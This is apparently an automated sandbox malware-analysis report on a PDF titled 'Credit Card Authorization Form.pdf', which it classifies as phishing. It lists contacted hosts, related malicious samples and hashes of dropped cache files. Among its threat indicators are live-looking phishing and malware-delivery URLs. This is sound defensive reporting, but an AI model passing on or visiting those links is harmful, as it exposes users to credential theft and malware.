This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Credit Card Authorization Form.pdf5%ReversingLabs
Credit Card Authorization Form.pdf2%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.129.229
truefalse
    high
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.24.14
      truefalse
        high
        www.google.com
        172.217.19.228
        truefalse
          high
          x1.i.lencr.org
          unknown
          unknownfalse
            high
            cdn.jsdelivr.net
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.jsfalse
                high
                https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.jsfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://chrome.cloudflare-dns.com87df5a63-4d58-4117-a9d9-fcbb6c1d3536.tmp.4.drfalse
                    high
                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.3.drfalse
                      high
                      https://raw.github.com/Stuk/jszip/main/LICENSE.markdown.chromecache_176.14.dr, chromecache_179.14.drfalse
                        high
                        https://github.com/nodeca/pako/blob/main/LICENSEchromecache_176.14.dr, chromecache_179.14.drfalse
                          high
                          http://stuartk.com/jszipchromecache_176.14.dr, chromecache_179.14.drfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.17.24.14
                            cdnjs.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            172.217.19.228
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            151.101.1.229
                            unknownUnited States
                            54113FASTLYUSfalse
                            151.101.129.229
                            jsdelivr.map.fastly.netUnited States
                            54113FASTLYUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            IP
                            192.168.2.16
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1577099
                            Start date and time:2024-12-18 01:01:04 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 24s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Credit Card Authorization Form.pdf
                            Detection:MAL
                            Classification:mal56.phis.winPDF@40/73@11/6
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .pdf
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.218.208.137, 54.224.241.105, 18.213.11.84, 50.16.47.176, 34.237.241.83, 162.159.61.3, 172.64.41.3, 172.217.19.206, 64.233.164.84, 172.217.19.227, 23.195.39.65, 23.32.238.163, 23.32.238.137, 23.32.238.130, 172.217.17.46, 199.232.210.172, 104.116.245.16, 2.16.158.107, 2.19.198.75, 2.22.50.144, 2.22.50.131, 142.250.181.3, 172.217.17.35, 23.218.208.109, 52.149.20.212, 23.56.162.204, 20.150.53.4
                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, adobe.blob.core.windows.net, clients2.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, stls.adobe.com-cn.edgesuite.net.globalredir.akadns.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, windows.net, ctldl.windowsupdate.com, p13n.adobe.io, stls.adobe.com-cn.edgesuite.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, edgedl.me.gvt1.com, armmf.adobe.com, a1815.dscr.akamai.net, clients.l.google.com, geo2.adobe.com, www.adobe.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            19:01:51API Interceptor2x Sleep call for process: AcroCEF.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                            • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                            http://vtaurl.comGet hashmaliciousUnknownBrowse
                            • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                            http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                            • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                            151.101.1.229http://www.ledger-secure03948.sssgva.com/Get hashmaliciousUnknownBrowse
                            • cdn.jsdelivr.net/jquery.magnific-popup/1.0.0/jquery.magnific-popup.min.js
                            New Scanned Copy.htmlGet hashmaliciousHTMLPhisherBrowse
                            • cdn.jsdelivr.net/jquery.slick/1.6.0/slick.min.js
                            151.101.129.229http://valleyprohealth.orgGet hashmaliciousUnknownBrowse
                            • cdn.jsdelivr.net/jquery.slick/1.5.1/slick-theme.css
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            jsdelivr.map.fastly.nethttps://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                            • 151.101.1.229
                            https://6movies.stream/series/cobra-kai-80711/6-4/Get hashmaliciousUnknownBrowse
                            • 151.101.1.229
                            http://sdgfdjfgd19sdgfghfs.z33.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                            • 151.101.129.229
                            http://www.delinian.comGet hashmaliciousUnknownBrowse
                            • 151.101.1.229
                            http://www.delinian.com/delinian-group-trading-companiesGet hashmaliciousUnknownBrowse
                            • 151.101.65.229
                            https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.comGet hashmaliciousUnknownBrowse
                            • 151.101.193.229
                            https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                            • 151.101.65.229
                            https://aweitapp.com/zeng/advance/authGet hashmaliciousHTMLPhisherBrowse
                            • 151.101.129.229
                            Remit_Advice_SMKT_84655.htmGet hashmaliciousHTMLPhisherBrowse
                            • 151.101.65.229
                            https://business.livechathelpsuite.comGet hashmaliciousUnknownBrowse
                            • 151.101.1.229
                            bg.microsoft.map.fastly.netConfigurator.exeGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            hades.exeGet hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            https://pdf-ezy.com/pdf-ezy.exeGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 199.232.214.172
                            support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 199.232.214.172
                            5.msiGet hashmaliciousDanaBot, NitolBrowse
                            • 199.232.214.172
                            file.exeGet hashmaliciousRemcosBrowse
                            • 199.232.214.172
                            https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                            • 199.232.210.172
                            lavita.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                            • 199.232.210.172
                            mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            cdnjs.cloudflare.comhttps://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.24.14
                            https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=temadewelgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6D%6F%74%6C%65%79%2D%61%6D%65%6E%61%62%6C%65%2D%73%74%69%6E%67%2E%67%6C%69%74%63%68%2E%6D%65#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==Get hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                            • 104.17.24.14
                            https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                            • 104.17.25.14
                            https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                            • 104.17.25.14
                            https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            Payment_Failure_Notice_Office365_sdf_[53487].htmlGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            http://sharefileon.comGet hashmaliciousUnknownBrowse
                            • 104.17.24.14
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUShttps://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            https://pdf-ezy.com/pdf-ezy.exeGet hashmaliciousUnknownBrowse
                            • 104.21.40.135
                            PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.177.134
                            Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            hades.exeGet hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                            • 104.21.23.76
                            https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                            • 104.16.123.96
                            https://technicalwriterhq.com/Get hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=temadewelgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6D%6F%74%6C%65%79%2D%61%6D%65%6E%61%62%6C%65%2D%73%74%69%6E%67%2E%67%6C%69%74%63%68%2E%6D%65#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==Get hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            FASTLYUShttps://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                            • 151.101.1.229
                            Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 185.199.108.153
                            https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                            • 151.101.65.91
                            https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                            • 151.101.2.137
                            https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                            • 151.101.194.137
                            https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                            • 199.232.192.193
                            https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                            • 199.232.192.193
                            tightvnc-2.8.59-gpl-setup-64bit.msiGet hashmaliciousUnknownBrowse
                            • 151.101.193.91
                            https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                            • 151.101.66.137
                            rbqHSouklL.exeGet hashmaliciousUnknownBrowse
                            • 185.199.109.133
                            FASTLYUShttps://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                            • 151.101.1.229
                            Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 185.199.108.153
                            https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                            • 151.101.65.91
                            https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                            • 151.101.2.137
                            https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                            • 151.101.194.137
                            https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                            • 199.232.192.193
                            https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                            • 199.232.192.193
                            tightvnc-2.8.59-gpl-setup-64bit.msiGet hashmaliciousUnknownBrowse
                            • 151.101.193.91
                            https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                            • 151.101.66.137
                            rbqHSouklL.exeGet hashmaliciousUnknownBrowse
                            • 185.199.109.133
                            No context
                            No context
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):290
                            Entropy (8bit):5.184695855868644
                            Encrypted:false
                            SSDEEP:6:7Qf3Gg9+q2PRN2nKuAl9OmbnIFUt8OQf3ggJZmw+OQf3BG9VkwORN2nKuAl9Omb5:7Qf2g9+vaHAahFUt8OQfHJ/+OQfU9V5c
                            MD5:E1A59063C3C56EE78262486B434C61D7
                            SHA1:7225A72FE4161E036B661A45A5674B044947FCAF
                            SHA-256:FFF4115099B476DBB9C422073FE2FE6F08D7DDFB61D946376DE3C100D52EEDEF
                            SHA-512:E3C36994FA3E38EB93872AF99823125E267602213E12F0309EE89422069AA1224051E564863EA9E7F9C2D6B8D699499C2F2A8355E846D67BEF37790C0D021D1F
                            Malicious:false
                            Reputation:low
                            Preview:2024/12/17-19:01:39.414 19dc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-19:01:39.416 19dc Recovering log #3.2024/12/17-19:01:39.417 19dc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):290
                            Entropy (8bit):5.184695855868644
                            Encrypted:false
                            SSDEEP:6:7Qf3Gg9+q2PRN2nKuAl9OmbnIFUt8OQf3ggJZmw+OQf3BG9VkwORN2nKuAl9Omb5:7Qf2g9+vaHAahFUt8OQfHJ/+OQfU9V5c
                            MD5:E1A59063C3C56EE78262486B434C61D7
                            SHA1:7225A72FE4161E036B661A45A5674B044947FCAF
                            SHA-256:FFF4115099B476DBB9C422073FE2FE6F08D7DDFB61D946376DE3C100D52EEDEF
                            SHA-512:E3C36994FA3E38EB93872AF99823125E267602213E12F0309EE89422069AA1224051E564863EA9E7F9C2D6B8D699499C2F2A8355E846D67BEF37790C0D021D1F
                            Malicious:false
                            Reputation:low
                            Preview:2024/12/17-19:01:39.414 19dc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-19:01:39.416 19dc Recovering log #3.2024/12/17-19:01:39.417 19dc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):334
                            Entropy (8bit):5.157958466673974
                            Encrypted:false
                            SSDEEP:6:7Qf35N+q2PRN2nKuAl9Ombzo2jMGIFUt8OQf3i85Zmw+OQf3FMFNVkwORN2nKuAv:7QfpIvaHAa8uFUt8OQfS85/+OQf2F5Jg
                            MD5:D39C981EA589B8B75CF03B7C90D098AC
                            SHA1:A405B9D3F53B683792FB8F8BB78F34F41C9D100E
                            SHA-256:9A6D335F2124261ADD4FF1AF89562A76E05358297FDE57B83ABB45AE273B525C
                            SHA-512:C1E483FEE9C1E4E65120FA6ED219C0B45C3E2CD9F9B40A017B35EBDA20D4AEB6D5E4863D3AAAC33A6DAF854847B828753D31C83F6A54BCD7DDD159C4ACA3C829
                            Malicious:false
                            Reputation:low
                            Preview:2024/12/17-19:01:39.183 1a08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-19:01:39.187 1a08 Recovering log #3.2024/12/17-19:01:39.188 1a08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):334
                            Entropy (8bit):5.157958466673974
                            Encrypted:false
                            SSDEEP:6:7Qf35N+q2PRN2nKuAl9Ombzo2jMGIFUt8OQf3i85Zmw+OQf3FMFNVkwORN2nKuAv:7QfpIvaHAa8uFUt8OQfS85/+OQf2F5Jg
                            MD5:D39C981EA589B8B75CF03B7C90D098AC
                            SHA1:A405B9D3F53B683792FB8F8BB78F34F41C9D100E
                            SHA-256:9A6D335F2124261ADD4FF1AF89562A76E05358297FDE57B83ABB45AE273B525C
                            SHA-512:C1E483FEE9C1E4E65120FA6ED219C0B45C3E2CD9F9B40A017B35EBDA20D4AEB6D5E4863D3AAAC33A6DAF854847B828753D31C83F6A54BCD7DDD159C4ACA3C829
                            Malicious:false
                            Preview:2024/12/17-19:01:39.183 1a08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-19:01:39.187 1a08 Recovering log #3.2024/12/17-19:01:39.188 1a08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:modified
                            Size (bytes):403
                            Entropy (8bit):4.995906765568502
                            Encrypted:false
                            SSDEEP:12:YHO8sq1ksBdOg2HNNAcaq3QYiubrP7E4TX:YXsudMHNNr3QYhbz7n7
                            MD5:A116842A9631040E5DC9816AAC383808
                            SHA1:64983BB5293EA68263EF79EC528A906F9162EFDC
                            SHA-256:6A896647BE45D775B68C8BB6DB6DA6F17379DEC3A71ADA5D17E40A10B366BBA8
                            SHA-512:B34796A011141586FD8D5B8A168051287F10EB732274B2E1F498473B3AAAB040AC26194705C89ABD72C1963114C3B3024B4A15AFA4CAB5634E778D4BCC0CCA96
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379040108949190","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":602567},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):403
                            Entropy (8bit):4.995906765568502
                            Encrypted:false
                            SSDEEP:12:YHO8sq1ksBdOg2HNNAcaq3QYiubrP7E4TX:YXsudMHNNr3QYhbz7n7
                            MD5:A116842A9631040E5DC9816AAC383808
                            SHA1:64983BB5293EA68263EF79EC528A906F9162EFDC
                            SHA-256:6A896647BE45D775B68C8BB6DB6DA6F17379DEC3A71ADA5D17E40A10B366BBA8
                            SHA-512:B34796A011141586FD8D5B8A168051287F10EB732274B2E1F498473B3AAAB040AC26194705C89ABD72C1963114C3B3024B4A15AFA4CAB5634E778D4BCC0CCA96
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379040108949190","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":602567},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4099
                            Entropy (8bit):5.227175229406352
                            Encrypted:false
                            SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xeBfEV:OLT0bTIeYa51Ogu/0OZARBT8kN88BfEV
                            MD5:BDFB95F59064914627EDCD2A6F2A15C0
                            SHA1:CC8BDE551221C0D5210A4144C3D598701998B1DC
                            SHA-256:4CB70F1053B3A8D7C26F18FA01D51753219D059E9C8FD321B8F24E9F1E1F5A62
                            SHA-512:B9ABC3041BFEB622DB22D13987852C3F906D276A9540A277393C358609602223F532E107602623255C12CB95959AE50057CEC3B58DFADCAC024E028EB82A6AD7
                            Malicious:false
